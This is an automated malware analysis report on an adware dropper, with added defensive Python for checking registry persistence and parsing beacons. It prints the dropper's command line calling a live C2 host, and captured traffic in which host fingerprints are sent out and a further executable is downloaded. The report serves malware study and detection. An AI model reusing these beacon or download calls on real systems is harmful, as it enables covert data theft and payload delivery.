Dropped.Trojan.GenericKD.3249083_4f12f94555

by malwarelabrobot on May 31st, 2017 in Malware Descriptions.

Gen:Variant.Zusy.205918 (BitDefender), Program:Win32/Hadsruda!bit (Microsoft), not-a-virus:HEUR:AdWare.MSIL.Dotdo.gen (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Adware.Dotdo.78 (DrWeb), Gen:Variant.Zusy.205918 (B) (Emsisoft), Artemis!4F12F945559D (McAfee), Trojan.Gen.2 (Symantec), AdWare.MSIL.Dotdo (Ikarus), Gen:Variant.Zusy.205918 (FSecure), Downloader.AUHZ (AVG), Win32:Adware-gen [Adw] (Avast), TROJ_GE.4BE09BB1 (TrendMicro), Dropped:Trojan.GenericKD.3249083 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 4f12f945559d2f133e7e08b819e44e7d
SHA1: be2a7eb524eac1c01e60f151bced67c7bb43c4bf
SHA256: 15eb094101de352525ad5770eebf39da1bfd005bb0c5383fd245de616b0dad0a
SSDeep: 3072:GgXdZt9P6D3XJXC47nXemItOdoewR3kHhhDfrsHXTXQhQDC:Ge3404jOmCOdVwsxfrsHXTAhF
Size: 152842 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

What the analysis below shows: the sample is a Nullsoft installer (the manifest recovered in the strings section identifies Nullsoft Install System v2.46 and requests requireAdministrator). It extracts helper executables into %LocalAppData% (uid.exe, ddnow.exe, tinstall.exe and their *4 variants), installs an "Applica" program published by "Dotdo" under %Program Files%\applica with Run entries in both HKLM and HKCU, and sets a marker key HKLM\SOFTWARE\idot. The component ddnow.exe, which is started with the C2 URL on its command line (see the strings section), POSTs a host fingerprint to 162.222.194.89: MAC address, a machine identifier, baseboard vendor, disk model and serial, the Windows product ID and the installed antivirus (reported empty here). It also fetches a further PE file from the same host (setup200.exe, 61844 bytes, whose readable header fragments show an NSIS-style .ndata section). The "Expect: 100-continue" request header and the dotnet=yes parameter are consistent with the downloader being a .NET program, which matches the MSIL-based detection names above.

Two caveats for anyone reusing this report: the fingerprint sent to the server identifies a VMware guest (MAC OUI 00:50:56, "VMware Virtual S SCSI Disk Device"), so the server may have served something other than what a real victim would receive; and the "Packed" entropy verdict reflects the compressed NSIS archive appended after the PE sections, since the sections themselves (see PE Sections) have low entropy and .ndata has no raw data at all, which is normal for an NSIS stub. The UPolyXv05_v6 PEiD match is a loose signature that frequently fires on NSIS stubs and is not evidence of a custom packer.

Payload

No specific payload has been found.

Process activity

The Dropped creates the following process(es):

ns5590.tmp:2176
%original file name%.exe:1900
ddnow.exe:2996
ddnow.exe:3060
tinstall.exe:2692
setupone.exe:3488

The Dropped injects its code into the following process(es):

applica.exe:3072

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ns5590.tmp:2176 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (12 bytes)

The process %original file name%.exe:1900 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll (5469 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe (5 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\uid.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\13904298.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\uid4.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss53BA.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\ns5590.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\icka13904298.txt (0 bytes)

The process ddnow.exe:2996 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\aatxtname.txt (10 bytes)

The process ddnow.exe:3060 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe (61 bytes)

The process tinstall.exe:2692 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\system.ini (16 bytes)

The process setupone.exe:3488 makes changes in the file system.
The Dropped creates and/or writes to the following file(s):

%Program Files%\applica\applica.exe (12 bytes)
%Program Files%\applica\key.ini (0 bytes)
%Program Files%\applica\uninstall.exe (1030 bytes)

The Dropped deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nss7EB0.tmp (0 bytes)

Registry activity

The process ddnow.exe:2996 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry. The HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32 and ddnow_RASMANCS keys (and the tinstall_* equivalents further down) are created by Windows itself the first time a process uses the RAS/WinINet networking APIs; they show that ddnow.exe and tinstall.exe made network calls, but they are not persistence and need no cleanup:

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ddnow_RASMANCS]
"ConsoleTracingMask" = "4294901760"

The process tinstall.exe:2692 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\tinstall_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"

The process setupone.exe:3488 makes changes in the system registry.
The Dropped creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"DisplayName" = "Applica"

"Publisher" = "Dotdo"

[HKLM\SOFTWARE\idot]
"idot" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica]
"UninstallString" = "%Program Files%\Applica\uninstall.exe"

To run automatically at every boot and logon, the Dropped registers applica.exe under the same value name in both the machine-wide and the per-user Run keys, so both entries have to be removed:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Applica" = "%Program Files%\applica\applica.exe"
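
A host check for exactly the persistence and marker keys listed above, as an added example that is not part of the original report. The matching logic works on a snapshot dictionary so it can be exercised offline; on Windows the snapshot is filled from the live registry with the standard winreg module. The snapshot contents below are constructed to reproduce the values reported above plus one benign Run entry.

```python
"""Audit a host for the Applica Run entries and the HKLM\\SOFTWARE\\idot marker.

Added example, not code from the report. Registry data is read into a
snapshot dict ((hive, key) -> {value name: data}) so the matching can be
tested offline; snapshot_from_live_registry() fills it on Windows.
"""
import sys
from typing import Dict, List, Tuple

# Key paths and value names exactly as reported in the registry activity above.
RUN_KEYS = [
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"),
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"),
]
MARKER_KEYS = [
    ("HKLM", r"SOFTWARE\idot"),
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Applica"),
]
# Lower-case substrings of Run value data that identify this installer.
SUSPICIOUS_RUN_DATA = [r"\applica\applica.exe"]

Snapshot = Dict[Tuple[str, str], Dict[str, str]]


def find_persistence(snap: Snapshot) -> List[str]:
    """Return one line per matching Run value or marker key present in the snapshot."""
    findings = []
    for hive, key in RUN_KEYS:
        for name, data in snap.get((hive, key), {}).items():
            low = data.lower()
            if name.lower() == "applica" or any(s in low for s in SUSPICIOUS_RUN_DATA):
                findings.append(f"{hive}\\{key} : {name} = {data}")
    for hive, key in MARKER_KEYS:
        if (hive, key) in snap:
            findings.append(f"{hive}\\{key} present")
    return findings


def snapshot_from_live_registry() -> Snapshot:
    """Windows only: read the keys above from the live registry."""
    import winreg  # only importable on Windows
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    snap: Snapshot = {}
    for hive, key in RUN_KEYS + MARKER_KEYS:
        try:
            with winreg.OpenKey(hives[hive], key) as handle:
                values = {}
                index = 0
                while True:
                    try:
                        name, data, _ = winreg.EnumValue(handle, index)
                    except OSError:
                        break  # no more values
                    values[name] = str(data)
                    index += 1
                snap[(hive, key)] = values
        except FileNotFoundError:
            continue  # key absent: nothing to record
    return snap


# Constructed snapshot: the values reported above plus one benign entry.
SAMPLE_SNAPSHOT: Snapshot = {
    ("HKLM", r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"): {
        "Applica": r"C:\Program Files\applica\applica.exe",
        "SecurityHealth": r"%windir%\system32\SecurityHealthSystray.exe",
    },
    ("HKCU", r"Software\Microsoft\Windows\CurrentVersion\Run"): {
        "Applica": r"C:\Program Files\applica\applica.exe",
    },
    ("HKLM", r"SOFTWARE\idot"): {"idot": "ok"},
}

if __name__ == "__main__":
    snapshot = snapshot_from_live_registry() if sys.platform == "win32" else SAMPLE_SNAPSHOT
    for line in find_persistence(snapshot):
        print(line)
```

Run it as-is on a non-Windows machine to see the matching against the constructed snapshot; on a Windows host it reads the real keys. The HKCU Run key is read for the current user only, so on a multi-user machine repeat the check under each profile (or load the other users' NTUSER.DAT hives).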

Dropped PE files

MD5 File path
b528db49e0768a9591d6ef902b67416a c:\Program Files\applica\applica.exe
fe1e3670cdc51a0ad694683c98a8c22c c:\Program Files\applica\uninstall.exe
d38543fc9ae37d188a23e06ee11d3504 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\SimpleFC.dll
acc2b699edfea5bf5aae45aba3a41e96 c:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll
bca4a017c0a71d525582d054f8902012 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe
c4f718889ff1ecadd19f83aae8298977 c:\Users\"%CurrentUserName%"\AppData\Local\ddnow4.exe
008afd62201f96d10b0b748e2779274d c:\Users\"%CurrentUserName%"\AppData\Local\setupone.exe
b35a0f0aa087c473bdfc575f51a05d24 c:\Users\"%CurrentUserName%"\AppData\Local\tinstall.exe
d3b2a92e9d0320d7159c32cbfa867f42 c:\Users\"%CurrentUserName%"\AppData\Local\tinstall4.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 86016 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 278528 2536 2560 3.13622 b9f20defc9dd650d8dcc7fc5d4708ad4

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 124
7bcde813c50a0b0e20e5f9f233bc3040
d8b2e09ac3e5478aeb7d9e0f27cbf4e1
e0ae45173f5a935422c0ce405a61afc8
160abb5aadc8f4c5ea3eb6cd53f48621
b2c2fe845b7047573fd3b5d20d966966
62c0e04ad607b9e9818d35189357bbd6
7453706033c86c24b16f3b83f4f6840d
976e7b3d6bb262cb6426a5f1ea916cba
f6aff0b9b146929b2c655288d5da55ed
688987076a743b6ad9a21cdf72e88aef
096cc8ec1268a7a48f4e8e9acffd275c
868d60bfcfe02d05fecfcb3e44e2ccce
516401f3104d731ca24c600b7ae68d76
a8c97fb33db997aaf9411704474278a1
5bec3c6a9950cf902e71b84dc814c3f9
29de0a3a7170f7dd71267eee2449b462
ca004345bdd1cb292744ed711de04d19
2a9af6bcab5eb49d9a62a6ea72cdd286
e4e8ea421895b321bea9afa16d8a6fb5
851b5de8d1e586ba0301b1027800dea8
54c304cd37a8ae6ce5c21d5a5240d80c
f4ae937348a591e02f7ccb79f47cdc1f
c27730e88a7e5003ff846e8f0e578968
023529d5b4f5db6fc3e123bf47ac15d6
8e38be8c510a94c0a96ee39bc32ed333

URLs

URL IP
hxxp://162.222.194.89/soid1.php?p=&aaaip=359524
hxxp://162.222.194.89/goet1.php?p=&pid=&all=&dotnet=yes
hxxp://162.222.194.89/setup200.exe
hxxp://162.222.194.89/newc4nT.php
d.rightmate.xyz


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP

Traffic

POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:23:08 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:54 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:44 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 285
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



;5wpy5gv2664;0-$fire-AT$bgot--L$cgot-c:\4f12f945559d2f133e7e08b819e44e7d.exe;a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- AV -


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:21 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
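
A parser for the fingerprint beacon captured above, as an added example that is not code from the report or from the sample. It splits the POST body into its prefix and the a= to f= fields, reports what the fingerprint gives away about the victim (here: a VMware guest with no antivirus), and matches captured request heads against the C2 paths listed under URLs. The body and request head are constructed copies of the captures above; the meaning assigned to each field letter (a=MAC, b=machine id, c=baseboard, d=disk, e=Windows product id, f=antivirus) is inferred from the captured values and is an assumption.

```python
"""Parse the host-fingerprint beacon this dropper POSTs to /goet1.php.

Added example; not code from the report or from the malware. Body layout
is taken from the captured request: a ';'-separated prefix followed by an
'&'-separated a=..f= list. Field meanings are inferred (assumption).
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed copy of the captured request body, with the line wrapping removed.
SAMPLE_BODY = (
    ";5wpy5gv2664;0-$fire-AT$bgot--L$cgot-c:\\4f12f945559d2f133e7e08b819e44e7d.exe;"
    "a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9"
    "&c=Intel CorporationBase BoardNone"
    "&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255"
    "&e=00426-OEM-8992662-00010&f=- AV -"
)

# Constructed request head in the shape of the captures above.
SAMPLE_REQUEST = (
    "POST /goet1.php?p=&pid=&all=&dotnet=yes HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: 162.222.194.89\r\n"
    "Content-Length: 285\r\n"
    "Expect: 100-continue\r\n"
)

FIELD_NAMES = {"a": "mac", "b": "machine_id", "c": "baseboard",
               "d": "disk", "e": "product_id", "f": "antivirus"}
AV_PLACEHOLDER = "- AV -"          # value sent when no AV product was found
C2_HOST = "162.222.194.89"
C2_PATHS = {"/soid1.php", "/goet1.php", "/newc4nT.php", "/setup200.exe"}
# OUIs registered to VMware; 00:50:56 is the one in the captured beacon.
VMWARE_OUIS = {"00:50:56", "00:0c:29", "00:05:69", "00:1c:14"}


@dataclass
class Beacon:
    campaign: str
    flags: str
    dropper_path: str
    fingerprint: Dict[str, str] = field(default_factory=dict)


def parse_beacon(body: str) -> Beacon:
    """Split ';<campaign>;<flags>-<dropper path>;<k=v&k=v...>' into its parts."""
    parts = body.split(";")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("not a goet1.php beacon body")
    flags, sep, path = parts[2].partition("-c:")
    if not sep:
        raise ValueError("dropper path missing from beacon prefix")
    fingerprint = {}
    for item in parts[3].split("&"):
        key, _, value = item.partition("=")
        fingerprint[FIELD_NAMES.get(key, key)] = value.strip()
    return Beacon(parts[1], flags, "c:" + path, fingerprint)


def sandbox_indicators(beacon: Beacon) -> List[str]:
    """What the operator can read off the fingerprint about the victim host."""
    reasons = []
    mac = beacon.fingerprint.get("mac", "").lower()
    if mac[:8] in VMWARE_OUIS:
        reasons.append(f"MAC OUI {mac[:8]} is registered to VMware")
    disk = beacon.fingerprint.get("disk", "").lower()
    if "vmware" in disk or "virtual" in disk:
        reasons.append("disk model names a virtual device")
    if beacon.fingerprint.get("antivirus", AV_PLACEHOLDER) == AV_PLACEHOLDER:
        reasons.append("no antivirus product reported")
    return reasons


def c2_endpoint(request_head: str) -> Optional[str]:
    """Return the C2 path if a captured request head targets a known endpoint."""
    lines = request_head.split("\r\n")
    method, _, rest = lines[0].partition(" ")
    path = rest.split(" ")[0].split("?", 1)[0]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if method == "POST" and headers.get("host") == C2_HOST and path in C2_PATHS:
        return path
    return None


if __name__ == "__main__":
    beacon = parse_beacon(SAMPLE_BODY)
    print(c2_endpoint(SAMPLE_REQUEST), beacon.campaign, beacon.dropper_path)
    for name, value in beacon.fingerprint.items():
        print(f"  {name:11} {value}")
    for reason in sandbox_indicators(beacon):
        print("  !", reason)
```

The VM indicators matter when reading the rest of this capture: the server saw a VMware MAC, a VMware disk and no antivirus, so the 61844-byte file it returned for setup200.exe is what it chose to give a machine that looks like an analysis box.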


POST /soid1.php?p=&aaaip=359524 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



aa


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:19 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 10
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
...1111111..


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:39 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:35 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:23:03 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:58 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:30 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


POST /setup200.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 1
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



;


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:25 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Description: File Transfer
Content-Disposition: attachment; filename=
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate, post-check=0, pre-check=0
Pragma: public
Content-Length: 61844
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
(binary response body: a 61844-byte PE file; the readable fragments show the MZ/PE headers, the "This program cannot be run in DOS mode" stub and the section names .text, .rdata, .data, .ndata and .rsrc, the same section layout as the analysed sample)

<<< skipped >>>

POST /newc4nT.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 162.222.194.89
Content-Length: 2
Expect: 100-continue
Connection: Keep-Alive


HTTP/1.1 100 Continue
....



OK


HTTP/1.1 200 OK

Date: Mon, 29 May 2017 23:22:49 GMT
Server: Apache/2.2.22 (Win64) mod_ssl/2.2.22 OpenSSL/1.0.1c PHP/5.3.13
X-Powered-By: PHP/5.3.13
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html


The Dropped connects to the servers at the following location(s):

See the URLs and Traffic sections above (162.222.194.89 and d.rightmate.xyz).

Strings from Dumps

%original file name%.exe_1900:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\Users\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.194.89/newc4nT.php" "OK" "icka13904298.txt"
5wpy5gv2664;0-$fire-AT$bgot--L$cgot-c:\%original file name%.exe;a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- AV -
" "13904298.txt"
C:\Users\"%CurrentUserName%"\AppData\Local\icka13904298.txt
nsExec.dll
SID\{D27CDB6E-AE6D-11cf-96B8-444553540000}\InprocServer32
ers\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp\nsExec.dll
.reloc
SShL0
PeekNamedPipe
CreatePipe
99|9
: :0:5:>:
KWindows
HNetCfg.FwMgr
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
GetCPInfo
gdi32.dll
SimpleFC.dll
AddPort
EnableDisablePort
IsPortAdded
IsPortEnabled
RemovePort
? ?'?6?=?_?
8 8$8(8,808
7%7/767~7
5!5%5)5-51555
hWEB
>6<%<-<7
..bYc
icka13904298.txt
5.ocx
ICKA13~1.TXT
sers\"%CurrentUserName%"\AppData\Local\ddnow.exe "hXXp://162.222.194.89/newc4nT.php" "OK" "icka13904298.txt"
\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp
f12f945559d2f133e7e08b819e44e7d.exe
\Windows\system32\Macromed\Flash\Flash32_23_0_0_185.ocx
c:\%original file name%.exe
C:\Users\"%CurrentUserName%"\AppData\Local
%original file name%.exe
ers\"%CurrentUserName%"\AppData\Local\Temp\nss53BA.tmp
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi53CB.tmp
a=00:50:56:38:44:C4&b=E2BF-F706-5D8D-98F7-43A2-79C5-C253-60F9&c=Intel CorporationBase BoardNone&d=VMware, VMware Virtual S SCSI Disk Device(Standard disk drives)1720565255&e=00426-OEM-8992662-00010&f=- AV -
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
German-language Delphi runtime error strings (translated here; truncated fragments are marked with ...):
-Operation f
Property %s does not exist.
OLE error %.8x
The method '%s' is not supported by the automation object
... ($0%x)
A component named %s already exists
Duplicates are not allowed in the string list
File %s cannot be created
